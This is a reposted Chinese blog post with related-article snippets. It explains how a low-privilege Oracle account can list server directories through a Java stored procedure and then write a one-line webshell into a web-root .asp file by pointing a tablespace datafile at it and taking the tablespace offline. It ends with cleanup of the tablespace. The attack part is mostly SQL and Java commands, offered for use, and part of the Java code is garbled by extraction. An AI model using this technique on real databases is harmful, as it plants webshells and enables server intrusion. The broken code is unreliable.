oracle低权限下获取shell

最新推荐文章于 2024-07-27 13:12:49 发布
最新推荐文章于 2024-07-27 13:12:49 发布
阅读量117 收藏
点赞数
文章标签: shell 数据库 java
转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code: create global temporary table BLUEUSER.dirlist( filename varchar2(255), filesize number, filedate date) on commit delete rows; / create or replace and compile java source named DirList as import java.io.*; import java.sql.*; public class DirList { public static void getList(String directory) throws SQLException { File path=new File(directory); String[] fileList=path.list(); String fileName; long fileSize; long fileDate; for (int i=0;i<filelist.length i filename="fileList[i];" file fpath="new" filesize="fpath.length();" filedate="fpath.lastModified();" into blueuser.dirlist values create or replace procedure blueuser.p_get_dir_list in varchar2 as language java name sql> exec BLUEUSER.p_get_dir_list(‘/tmp’); PL/SQL procedure successfully completed select * from BLUEUSER.dirlist; select * from BLUEUSER.dirlist where rownum create tablespace kjtest datafile ‘e:/website/kj.asp’ size 100k nologging ; 表空间已创建。 这里记住了 100K为ORACLE 表空间最小的单位,如果你的一句话SHELL比较大 那可以200K比较稳妥 但是最终建议一句话一定要最最简洁 SQL&gt; CREATE TABLE WEBSHELL(C varchar2(100)) tablespace kjtest; 表已创建。 一般用 VARCHAR类型已经可以 ,表空间太小了 ,所以不可以 为 CLOB或者 BLOB类型。 SQL&gt; insert into WEBSHELL values(‘’); 已创建 1 行。 SQL&gt; commit; 提交完成。 提交完成之后就 OK? NO~ 因为数据还没有被 DBWn 进程刷到文件呢. 所以需要同步一下CKPT以及OFFLINE当前表空间 SQL&gt; alter tablespace kjtest offline; 表空间已更改。 到这里 你的 一句话SHELL代码已经 写到 那个文件了 你会发现有这样的 的 代码 一句话shell已经OK了 最后使用后记得吧 表空间删除 SQL&gt; drop tablespace kjtest including contents; 表空间已删除。 </filelist.length>
iteye_11341
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell 读取oracle,Linux下Oracle获取shell
weixin_39806413的博客
04-05 203
作者:浅凝很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。而对于Linux下的Oracle数据库***,因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑,...
Oracle数据库拿shell,shell调用Oracle数据库方法
weixin_36058866的博客
04-06 622
shell 调用Oracle数据库方法 addStudent(){ LOGPATHFILE=/home/test/user/xxxx/log/bdfWarn.log UID=$1 UNAME=$2 UAGE=$3 USEshell 调用Oracle数据库方法addStudent(){LOGPATHFILE=/home/test/user/xxxx/log/bdfWarn.logUID=$1UNAM...
利用oracleShell
收集盒 Book box
09-02 830
SQL> create tablespace kjtest datafile 'e:\website\kj.asp'  size 100k nologging ;  复制代码 这样就创建了Table 空间。 这里需要注意的是oracle的Table,最小单位是100K。
Linux下Oracle获取shell
weixin_33953249的博客
01-05 106
作者:浅凝 很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。 而对于Linux下的Oracle数据库***,因为Linux下一般Oracl...
oracle+测试权限,使用权限 Oracle 数据库账户得到 OS 访问权限
weixin_42153615的博客
04-02 107
作者:Mickey这几天看了篇叫”Penetration: from application down to OS (Oracle)”的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 ...
oracle提权工具-oracleShell.zip
05-04
OracleShell允许用户通过命令行接口与Oracle数据库进行交互,执行SQL查询、操作数据以及利用可能存在的安全漏洞来提升权限。这在合法的安全审计中是非常有用的,因为它可以帮助发现并修复潜在的安全问题。然而,在...
Oracle Solaris 11.2 Managing Secure Shell Access in Oracle Solar
06-26
Oracle Solaris 11.2 管理Secure Shell访问》是Oracle公司发布的一份技术文档,旨在帮助用户在Oracle Solaris 11.2操作系统中管理和配置Secure Shell(SSH)服务,确保远程访问的安全性。Secure Shell是一种广泛...
centos6.5下自动安装oracle11的shell脚本
03-28
本篇文章将详细讲解如何在CentOS 6.5环境下,通过shell脚本来自动化安装Oracle 11g。 首先,让我们理解为何要使用shell脚本进行自动化安装。在手动安装Oracle的过程中,需要执行一系列复杂的命令和配置,包括环境...
linux shell 查询oracle数据库中的值 并返回
05-01
9. **权限**:确保运行脚本的用户具有执行SQL查询和连接到Oracle数据库所需的权限。 10. **性能优化**:对于大数据量的查询,考虑使用绑定变量、索引、分区等方法提高查询效率。 通过这些方法,我们可以创建一个...
shell脚本将Oracle服务器中数据定时增量刷新到ftp服务器中
09-09
1. **编写存储过程**:在Oracle数据库中,创建一个存储过程,用于获取自上次同步以来的增量数据。这可能涉及到复杂的SQL查询,比如使用`WHERE`子句筛选出时间戳大于特定值的记录。 2. **生成增量数据文件**:在...
oracle getshell,getshell工具
weixin_42223120的博客
04-16 559
设置height&colon;100&percnt;无效的解决方法设置height:100%无效的解决方法 刚接触网页排版的新手,常出现这种情况:设置table和div的高height="100%"无效,使用CSS来设置height:" ...again建立一个IPC连接: net use \\192.168.0.5\ipc$ "123456" /u:administrator&a...
使用权限oracle数据库账户得到管理员权限,使用权限Oracle数据库账户得到管理员权限数据库安全分享!...
weixin_29446529的博客
04-12 106
这几天看了篇叫”Penetration: from application down to OS (原理分析看原文吧,我这里把我的测试过程写出来.我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle1.先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo ...
oracle用户获取datameta权限,Oracle数据库提权(权限提升至dba)
weixin_39850062的博客
04-11 755
0x01 Oracle存储过程”缺陷”在 Oracle 的存储过程中,有一个有趣的特点:运行权限。运行权限分为两种,definer和 invoker。definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户。运行权限在函数创建时就已经被钦定了,默认为 definer。说白了,如果我们用权限用户去运行DBA权限用户创建的存储过程,我们在调用时就可以额访问DBA资源,使用DB...
oracle进行getshell
m0_55772907的博客
11-21 2463
getshell
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 5268
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
shell 读取oracle数据库表记录
pdw2009的专栏
03-07 6242
<br />xflag=0;<br />while [ $xflag -ne 10 ]<br />do<br />VALUE=`sqlplus -s dbusername/uspass@xxxx <<EOF<br />set heading off;<br />set feedback off;<br />set pagesize 0;<br />set verify off;<br />set echo off;<br />select service_sn  from  rule_phone_sell_
【busybox记录】【shell指令】echo
最新发布
44083579的博客
07-27 148
echo指令用法
Oracle Solaris 11.2 安全Shell访问管理指南
"Oracle Solaris 11.2 管理Secure Shell访问" 在Oracle Solaris 11.2操作系统中,管理Secure Shell (SSH)访问是系统管理员确保网络安全和控制远程访问的关键任务。Secure Shell是一种加密网络协议,用于替代不安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值